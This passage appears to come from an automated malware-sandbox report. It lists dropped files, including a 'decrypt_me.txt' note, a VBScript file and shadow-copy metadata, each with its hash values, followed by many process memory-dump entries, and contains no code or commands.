SHA5127a6b5e0eaf9d6919497e65808218f648d4627a271fa0bf78b954f40a024bc05e45780f23b2e50684ad777eb7bbc29ac4e7510823370e15eb32a514271ff07d4e
-
C:\Users\Admin\Desktop\decrypt_me.txtFilesize
4KB
MD5aa19d2efcd7dad677fad9a6f2f50407e
SHA1e43378603ccaa391bb9b9e3b6c5e6b0402b6efa8
SHA256dc75d0f8ed49934e0a1682edbbc549d78bcecd5218410fce65e36467647afee0
SHA512a155877add8a0277e1ad7150fa05724afb3b3f61022ace21a8ada79f5a98da1ff65582c5e801764add118f8151d2f719a818b7b1aea9d4e39ff13f2ecdff85d8
-
C:\Users\Admin\Desktop\tmpFilesize
7B
MD5a55ab7512f0d0ff4527d898d06afd5c5
SHA1b1b0f3993c24e223152a9a41242cdd6757754a86
SHA2566722aeed5f5d8297de4eb2cba1c5abb900afe4a4cd64b10e2835463087936666
SHA512f7fe4429179bdd4cd30177ce663960f153bb5ddd8d227befb66929281638ffbba65857b4b43a6065dc96238a2a0a9e5fcac4fe40ec987405f9956f78bd7f7e15
-
C:\Users\Admin\Desktop\vbscript.vbsFilesize
137B
MD572959f3cbd2019c7b166a765484ccc3a
SHA1bcfc8ddb28471672251c00678448b73332529219
SHA2564efac9fe2b4ed508e2171049693e904251f3cefe773744c2e8e9ec8f8f803a35
SHA512afa22339e689f92b0f28fc6fd62c4ad492f69d8c396567f3b5ef9bc39d7fc5052bf0d9358bd6bb5ca921b5c010c7187e5d396d78a44616af7ad7d0a9b9ac4778
-
C:\Users\Admin\Downloads\xFilesize
4KB
MD51c604b4fef887029e9a3fa342fa908fa
SHA127bd3753c25ea4ea49c7c7b564a1fd641bd0eb23
SHA256d6a4b048b5f28963aeac2e56db9ceeb4607c068cbe06c041631b9c878964330e
SHA512ff804c5b76e5aeb6efbd6a7650d5614e922ab605a45873aaeec0ae898e1a7275dc4ec862cd0bef20998e1b741b2add2846e4cfa9c0fcaaf197c4c50aa934cdf8
-
C:\Users\Admin\Downloads\z.zipFilesize
8KB
MD563ee4412b95d7ad64c54b4ba673470a7
SHA11cf423c6c2c6299e68e1927305a3057af9b3ce06
SHA25644c1857b1c4894b3dfbaccbe04905652e634283dcf6b06c25a74b17021e2a268
SHA5127ff153826bd5fed0a410f6d15a54787b79eba927d5b573c8a7f23f4ecef7bb223d79fd29fe8c2754fbf5b4c77ab7c41598f2989b6f4c7b2aa2f579ef4af06ee7
-
C:\Windows\Installer\e5927f3.msiFilesize
1.2MB
MD5e738da4ddde4ec6a45f0e5e64acc99aa
SHA1bd7d7aab63690429eda5d715d7199fa1ea658fea
SHA256aa96e7facf48235b091b01453ae6290860b1ff28889026e72936172875efe70c
SHA5121bf3191ebca190d28750ba59aa0bb93d0006b8804c377764e7b6358acfdfcc6ea3676d3fd4033c2bb0dd0eb69ec35dc010ba761c3cf91f85d1a3ea765d1a854b
-
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2Filesize
23.7MB
MD57c63248697eabdf51d9fd289ed582ed2
SHA1d0422a514f571fadf79c5c9fe01569d2857e3d6c
SHA2560dc7d81f8a653b22432945141407694c132a34df5bff912f6bc1a14d0b8ef2d5
SHA51264e46c820c7698376be3a30e1971984dceccfd7a4892a3c86bac9798dbf2c820840a35a8af4d2365e7dfae4fd6e2fca946c6d76bd180759b4ab15e090d0db80d
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\Volume{8a2ad7b7-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{6cead35b-9383-4f2d-ab5e-671e15376a36}_OnDiskSnapshotPropFilesize
6KB
MD57ed4266fe8b672124005633cc7cc60b1
SHA117a6bb94fc61f81b2102eaa1f3de3596a360a112
SHA256c10d0292f156337643106ec3fad605c41175591b21e621f9e9b3ed252171dacc
SHA512ed003ab8b7098452e7e1903583d38de05f339408b1c243bd967e68ebbe872af191f8a502ad13161297b8eb0d14d676019caaf519500007887913045ab9622d16
-
memory/212-3158-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/212-3155-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/448-3363-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/448-3367-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/868-3146-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/868-3578-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/868-3149-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/868-3568-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/896-3652-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1168-3196-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1292-3490-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1292-3446-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1292-3451-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1292-3498-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1448-3358-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1648-3719-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1684-3535-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1684-3530-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1688-3642-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1884-3754-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/1892-3185-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/2028-3242-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/2028-3239-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/2080-136-0x000001F31F790000-0x000001F31F952000-memory.dmpFilesize
1.8MB
-
memory/2080-135-0x000001F31F110000-0x000001F31F132000-memory.dmpFilesize
136KB
-
memory/2172-3208-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/2284-3232-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/2660-3362-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/2660-3359-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/2808-3680-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/2936-3606-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3116-3612-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3180-3524-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3180-3518-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3292-3163-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3292-3167-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3392-3698-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3444-3590-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3444-3585-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3472-3216-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3472-3212-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3652-3416-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3692-3211-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3692-3171-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3692-3168-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3772-3459-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3772-3465-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3772-3562-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3772-3243-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3772-3247-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3916-3200-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/3916-3197-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4100-3176-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4100-3172-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4316-3162-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4316-3354-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4316-3159-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4376-3238-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4460-3385-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4460-3383-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4552-3399-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4552-3397-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4572-3633-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4692-3757-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4700-3369-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4924-3201-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4924-3205-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4944-3217-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/4944-3221-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5000-3727-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5000-3192-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5004-3688-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5020-3177-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5020-3181-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5356-3503-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5356-3511-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5356-3229-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5424-3745-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5576-3709-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5584-3407-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5672-3235-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5676-3623-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5684-3371-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5704-3426-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5704-3154-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5704-3150-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5732-3439-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5732-3432-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5836-3222-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5836-3225-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5852-3668-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/5964-3703-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/6136-3189-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB
-
memory/6136-3186-0x0000000000400000-0x0000000000625000-memory.dmpFilesize
2.1MB